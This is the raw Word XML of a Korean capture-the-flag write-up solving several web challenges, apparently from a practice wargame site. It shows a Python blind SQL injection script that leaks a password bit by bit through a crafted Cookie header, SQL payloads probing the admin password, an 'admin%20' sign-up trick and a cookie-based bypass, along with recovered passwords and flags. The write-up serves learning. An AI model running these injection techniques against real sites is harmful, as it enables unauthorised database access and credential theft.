                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">    for j in range(1, 8):</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">        header = {'Cookie': 'time=1532780804 and (select substr(lpad(bin(ord(substr(password, '+str(i)+', 1))), 7, 0), '+str(j)+', 1) from FreeB0aRd)=1; PHPSESSID=bb5c626601193b1eb4ee5de882a44a8b'}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">        req = urllib2.Request(url, headers = header)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">        </w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">        data = urllib2.urlopen(req).read()</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">        if '&lt;!--2070-01-01 09:00:01--&gt;' in data:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">            tmp += pow(2, 7-j)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">        if j == 7:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">            result += chr(tmp)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007B061C" w:rsidRDefault="007B061C" w:rsidP="00652817">
                      <w:r>
                        <w:t xml:space="preserve">            print(resul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a4"/>
        </w:rPr>
        <w:t>prob2_2.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652817" w:rsidRDefault="00652817" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00652817" w:rsidRDefault="00652817" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00652817" w:rsidRDefault="00652817" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00652817" w:rsidRPr="00652817" w:rsidRDefault="00652817" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00145BAE" w:rsidRDefault="004A40B5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2C86692A" wp14:editId="13A7BFD1">
            <wp:extent cx="2752725" cy="4048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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57C8C603" wp14:editId="4E41DF30">
            <wp:extent cx="5731510" cy="10928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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">비밀번호를 치고 들어가면 </w:t>
      </w:r>
      <w:r>
        <w:t>admin manual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이라는 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">zip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일을 받을 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652817" w:rsidRDefault="00652817" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2457F629" wp14:editId="35E9B1E1">
            <wp:extent cx="5572125" cy="2486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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">비밀번호가 걸려 있으니 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 비밀번호도 알아내야 할 것 같다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652817" w:rsidRPr="00652817" w:rsidRDefault="00652817" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00652817">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1532780804 and (select length(password) from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00652817">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>admin)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00652817">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652817" w:rsidRDefault="00652817" w:rsidP="00DB1207">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pP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 xml:space="preserve">페이지의 이름이 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이므로 테이블 이름을 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>게싱했다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652817" w:rsidRDefault="00652817" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:t>length(password) = 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652817" w:rsidRDefault="00F6585E" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>짠 코드에 l</w:t>
      </w:r>
      <w:r>
        <w:t>ength</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">와 </w:t>
      </w:r>
      <w:r>
        <w:t>table name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>만 바꿔 a</w:t>
      </w:r>
      <w:r>
        <w:t>dmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 비밀번호를 구해보면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6585E" w:rsidRDefault="00F6585E" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F683935" wp14:editId="45E839CB">
            <wp:extent cx="2876550" cy="4219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의 비밀번호는 </w:t>
      </w:r>
      <w:r>
        <w:t>0nly_admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6585E" w:rsidRDefault="00F6585E" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AC1997D" wp14:editId="6D27E4F8">
            <wp:extent cx="5276850" cy="1390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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">매뉴얼의 비밀번호는 </w:t>
      </w:r>
      <w:r>
        <w:t>@dM1n__nnanual</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6585E" w:rsidRDefault="00F6585E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3C82D556" wp14:editId="48B1717A">
            <wp:extent cx="3352800" cy="2038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t>Flag is HacKed_by_n0b0dY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F402E0" w:rsidRPr="00F402E0" w:rsidRDefault="00F402E0" w:rsidP="00F402E0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F402E0">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>prob3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F402E0" w:rsidRDefault="00F402E0" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C9AD891" wp14:editId="6B7321A4">
            <wp:extent cx="4867275" cy="5105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0" w:rsidRDefault="00F402E0" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문제로 들어가면 퍼즐이 나온다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F402E0" w:rsidRDefault="00F402E0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2F7ED8B2" wp14:editId="304BE1BB">
            <wp:extent cx="5731510" cy="40335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0" w:rsidRDefault="00F402E0" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">오른쪽 아래 </w:t>
      </w:r>
      <w:r>
        <w:t>5*5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 부분을 클릭하면 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kk_Num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값을 수정할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F402E0" w:rsidRDefault="000A732F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69AD0C90" wp14:editId="4C25E690">
            <wp:extent cx="5676900" cy="48863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0A732F" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>퍼즐을 풀면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A732F" w:rsidRDefault="000A732F" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64E0D993" wp14:editId="41951DD5">
            <wp:extent cx="2057400" cy="6000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0A732F" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값을 입력할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A732F" w:rsidRDefault="000A732F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1ED32997" wp14:editId="0777B0F8">
            <wp:extent cx="3276600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5C3B29" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>게시판에 이름을 남길 수 있는 것이었다.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09EF6FCD" wp14:editId="34C86B2D">
            <wp:extent cx="5391150" cy="4943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로 넘어가는 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">answer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">인자에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injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 해보면 </w:t>
      </w:r>
      <w:r>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>new_sql_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00516B31" w:rsidRPr="00B00DBB" w:rsidRDefault="00516B31" w:rsidP="00516B3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4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FEAB05E" wp14:editId="15A1AEF9">
            <wp:extent cx="5457825" cy="10477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 xml:space="preserve">뒤에 </w:t>
      </w:r>
      <w:r>
        <w:t>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 보니 </w:t>
      </w:r>
      <w:r>
        <w:t>Base64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코딩 해보면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516B31" w:rsidRDefault="00516B31" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r w:rsidRPr="00516B31">
        <w:t>c4033bff94b567a190e33faa551f411caef444f2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 나온다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 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B64DEAE" wp14:editId="7E0DCBFB">
            <wp:extent cx="3514725" cy="4953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>s</w:t>
      </w:r>
      <w:r>
        <w:t>ha1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>는 취약한 알고리즘이다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">굳이 쓴다면 </w:t>
      </w:r>
      <w:r>
        <w:t>md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>와 함께 사용한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516B31" w:rsidRDefault="00516B31" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:t>40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>글자로 된 1</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">진수 집합이므로 </w:t>
      </w:r>
      <w:r>
        <w:t>sha1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 디코딩 해보면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8AF188D" wp14:editId="49B0E7AA">
            <wp:extent cx="3305175" cy="3333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F67B231" wp14:editId="6478EE2A">
            <wp:extent cx="3676650" cy="2381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1D7A922" wp14:editId="4EBCE098">
            <wp:extent cx="409575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Pr="00B00DBB" w:rsidRDefault="00516B31" w:rsidP="00516B3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lastRenderedPageBreak/>
        <w:t>prob5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67C78ED" wp14:editId="1B64CAFD">
            <wp:extent cx="4010025" cy="17049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t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">과 </w:t>
      </w:r>
      <w:r>
        <w:t>Join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 있다.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293979F2" wp14:editId="7F9E45D4">
            <wp:extent cx="5731510" cy="148907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E96484" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 클릭하면 m</w:t>
      </w:r>
      <w:r>
        <w:t>em/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 이동하고</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96484" w:rsidRDefault="00E96484" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr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를 클릭하면 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Access_Denied</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 경고를 띄운다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96484" w:rsidRDefault="00E96484" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>그냥 /</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 들어가 봤더니 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>tz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서버를 찾았다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96484" w:rsidRDefault="00E96484" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="789B0C06" wp14:editId="60E9B98B">
            <wp:extent cx="4886325" cy="26860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84" w:rsidRDefault="00E96484" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이를 통해서 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>join.php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게싱</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 없이 접근할 수 있다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>그냥 검기만 한 창이 나오는데</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96484" w:rsidRDefault="00E96484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66E4C9E6" wp14:editId="63AFDD83">
            <wp:extent cx="5731510" cy="153162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84" w:rsidRDefault="00E96484" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>소스를 보면 이렇게 나온다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C3598A" w:rsidRDefault="00B71A9B" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29D3F98E" wp14:editId="22FAB9D0">
            <wp:extent cx="5731510" cy="607060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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변수의 값을 추출한다.</w:t>
      </w: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71EAFBF9" wp14:editId="02B27E57">
            <wp:extent cx="5731510" cy="702310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="254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2D744D4D" wp14:editId="0D853B8C">
            <wp:extent cx="1924050" cy="306705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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>즉,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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o</w:t>
      </w:r>
      <w:r>
        <w:t>ldzombie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 있어야 하며</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71A9B" w:rsidRDefault="00B71A9B" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ocument.URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 m</w:t>
      </w:r>
      <w:r>
        <w:t>ode=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 있어야 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71A9B" w:rsidRDefault="00B71A9B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7024F71C" wp14:editId="08D5F3D4">
            <wp:extent cx="5731510" cy="2066290"/>
            <wp:effectExtent l="0" t="0" r="254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rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인 테이블이 뜨는 것을 볼 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B71A9B" w:rsidRDefault="00B71A9B" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pP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0EC2C7F1" wp14:editId="14244D32">
            <wp:extent cx="1933575" cy="504825"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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71A9B" w:rsidRDefault="00B71A9B" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/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만드려고</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 하니 이미 존재한다고 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E6519" w:rsidRDefault="005E6519" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18EF51B5" wp14:editId="3745674B">
            <wp:extent cx="3781425" cy="3857625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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19" w:rsidRDefault="005E6519" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>dmin%20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로 가입을 해주고</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E6519" w:rsidRDefault="005E6519" w:rsidP="00652817">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dmin, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>krrr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 로그인을 하면 </w:t>
      </w:r>
      <w:r w:rsidR="00A306D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문제가 풀린다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A306D1" w:rsidRDefault="00A306D1" w:rsidP="00A306D1">
      <w:pPr>
        <w:ind w:right="800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6A5D9473" wp14:editId="2C32E3C3">
            <wp:extent cx="5731510" cy="2122170"/>
            <wp:effectExtent l="0" t="0" r="254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D1" w:rsidRDefault="00A306D1" w:rsidP="00A306D1">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A306D1" w:rsidRDefault="00A306D1" w:rsidP="00A306D1">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A306D1" w:rsidRPr="00B00DBB" w:rsidRDefault="00A306D1" w:rsidP="00A306D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t>prob6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A306D1" w:rsidRDefault="004B7047" w:rsidP="00A306D1">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AE1AA1F" wp14:editId="65956B8E">
            <wp:extent cx="1390650" cy="122872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조금 시도하다 찍어서 저렇게 찍혔는데,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>소스를 보면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2AA4B9E9" wp14:editId="0188C6E1">
            <wp:extent cx="2990850" cy="52673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 xml:space="preserve">이 과정을 </w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>번 거쳐 C</w:t>
      </w:r>
      <w:r>
        <w:t>ypher text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 만들고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27AB8F20" wp14:editId="4F7A5A11">
            <wp:extent cx="2762250" cy="5114925"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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p</w:t>
      </w:r>
      <w:r>
        <w:t>lain text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">가 만약 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이라면 문제가 풀리므로 </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 그대로 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>암호화 해야</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B7047" w:rsidRDefault="004B7047" w:rsidP="00A306D1">
      <w:pPr>
        <w:ind w:right="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
